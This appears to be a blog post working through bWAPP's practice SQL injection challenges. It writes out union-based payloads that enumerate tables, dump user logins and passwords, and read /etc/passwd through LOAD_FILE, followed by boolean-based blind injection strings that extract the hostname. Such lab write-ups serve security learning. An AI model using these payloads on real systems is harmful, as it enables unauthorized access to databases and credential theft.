--- SQLi GET / Search Results - With security level set to low
URL with SQLi:
http://bwapp/sqli_1.php?title=a' union SELECT 1,table_schema,table_name,4,5,6,7 FROM information_schema.tables WHERE table_schema!='mysql' AND table_schema!='information_schema&action=search
The above query was taken from the MySQL SQL Injection Cheat Sheet located here. The purpose of this query is to have returned the database and table names of the database. I also had to experiment with the number of columns that were expected and how it was displayed.
Now I need to find out the structure of the tables...
URL for SQLi:
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,table_schema,%20table_name,%204,column_name,6,7%20FROM%20information_schema.columns%20WHERE%20column_name=%27password%27%20AND%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema&action=search
The above SQL injection returns the columns of the tables that contain the word password in them so now we can formulate our query to begin extracting information. The below query counts the records in the users table before we extract it in the event a lot of records are available to be extracted.
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20count%28*%29,%203,%204,%205,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search
This returns that there are 2 records that can be extracted.
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20login,%20password,%20email,%20admin,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search
The above query returned the login, password, email and if they are an admin of the application in the search results...
--- SQLi GET / Select - With security level set to low...
In this challenge it only returns 1 record at a time because evaluating the code it does not loop around the recordset that is returned. This adds a small challenge, however, not impossible to do the same thing as above.
SQLi URL:
http://bwapp/sqli_2.php?movie=99%20union%20SELECT%201,table_schema,table_name,4,LOAD_FILE%28%27/etc/passwd%27%29,6,7%20FROM%20information_schema.tables%20WHERE%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27&action=go
The above query returns the 99th row of the union selected query with also loading the /etc/passwd file so we can gather the user names on the system.
SQL Injection Boolean Based
— The below method would allow for trying each character in a character set until it came back with the correct character...
Iron Man' AND SUBSTRING(@@hostname,1,1) = ‘b - Worked
Iron Man’ AND SUBSTRING(@@hostname,2,1) = ‘W - Worked
— What if we use regular expressions to determine if the letter is between a set of characters…
Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-n] - Returns True
Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-g] - Returns True
Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-c] - Returns True
— This narrows it down to less than 8 queries to figure out the first character of the hostname… It would have taken 2 or 28 depending on if you started with a-z or A-Z.
No comments:
Post a Comment